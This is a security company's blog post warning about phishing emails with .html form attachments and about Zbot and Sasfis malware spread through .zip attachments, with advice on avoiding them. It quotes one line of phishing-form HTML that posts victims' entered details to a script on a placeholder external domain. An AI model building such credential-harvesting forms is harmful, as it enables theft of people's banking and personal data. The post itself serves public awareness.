blog.brandprotect.com

The rise of Spam and Phishing emails carrying attachments

  

 Email Article  

Tweet  

  

  

Are you overloaded with unwanted spam messages in your inbox with subject headings like “Your wife’s photo’s attached,” “Resume,” “Join my network on LinkedIn,” or “Online banking verification.”  I am sure that many of us have seen emails like these in our inboxes. They not only frustrate us but also signify the importance of protecting ourselves from identity theft. The Sasfis and ZBot malware campaigns that continue to spread across the internet illustrate how spam messages carrying malicious attachments have hit an all-time high this year. Recent research by Symantec indicates that spam volume has increased by 10% from May to July with the US being one of the top nations for sending spam. According to Symantec’s monthly report, “State of Spam and Phishing”; “Malware spam more than tripled in volume and .zip attachment spam saw a four-fold increase month-over-month. In addition to the .zip attachment, there was a wave of .html attachments with malicious JavaScript”. Here at BrandProtect we are seeing an increase in .html form phishing scams targeting many of our clients.

What are phishing scams with .html attachments?

Perpetrators send out a phishing scam that appears in someone’s inbox carrying an attachment most commonly titled “online Banking verification.html”

Once you open the attachment you are directed to an html online form which asks you for personal information. Upon entering and submitting your information, the inputted data is then sent to the php or html file hosted on an external domain which stores this data for the perpetrators. By analyzing the source code of the form we will see the url (script) that looks similar to this http://somethingdomain/~info/AccountVerification/cf.php - this is where data is sent when the recipient presses the submit button. Here is an excerpt of what the source code looks like:

<form name="Form1" method="post" action="http://somethingdomain/~info/AccountVerification/cf.php" id="Form1" onsubmit="return check(document.Form1.all)">

Below you will see an example of a type of form that recipients are directed to once they open the html attachment.

After you press submit you are then auto-directed to the legitimate banking page, which makes the attack “seem” authentic.

Sasfis and Zbot Malware Campaign and .zip attachments

Along with html attachments, we’ve also seen a wave of spam messages with .zip attachments. The Symantec “State of Spam and Phishing” report indicates how both Sasfis and Zbot were used to send out alarming and enticing messages like ‘fake celebrity news” and a variety of shipping/delivery service brands. An interesting point noted by Symantec was, “Rather than attaching the images, spammers started to zip the images and send the .zip attachment instead. This combined with two Trojans mentioned above made up vast majority of .zip attachment spam.”

Subject headings like “your wife’s’ photos attached, “and ‘Resume,” according to Symantec, were among the top 5 subject lines used for spam. These subjects give spammers a greater opportunity to infect a machine as they tempt recipients by creating a sense of curiosity.  We all need to be aware of these types of spam messages and educate ourselves about malicious attachments that threaten our identity and personal information.

Symantec defines the Trojan Zbot as stealing confidential information from compromised computers which primarily targets system information, online credentials and banking details. Trojan Sasfis is a “Trojan horse that downloads and executes other malicious content. During August, spammers used a variety of shipping delivery service brands to trick users.”

With any phishing scam or spam message, we all know the goal of the perpetrator is to create a message that will entice, alarm and urge recipients to open email attachment with an attractive subject heading. It is important for us to stay alert, educate and protect ourselves from online identity theft.

How to protect yourself from malicious email attachments

• Never open email attachments from “unknown” senders
• Pay close attention to the subject heading and who the email is supposedly from
• Reputable organizations will never send you attachments with .html, .exe, .zip …
• Do not buy any product or services from spam messages
• Never fill out forms that ask for personal information
• Do not reply to the spam message

** For a more detailed look at do’s and don’ts regarding spam and phishing, check out the: Checklist: Protecting your business, your employees and your customers outlined by Symantec. **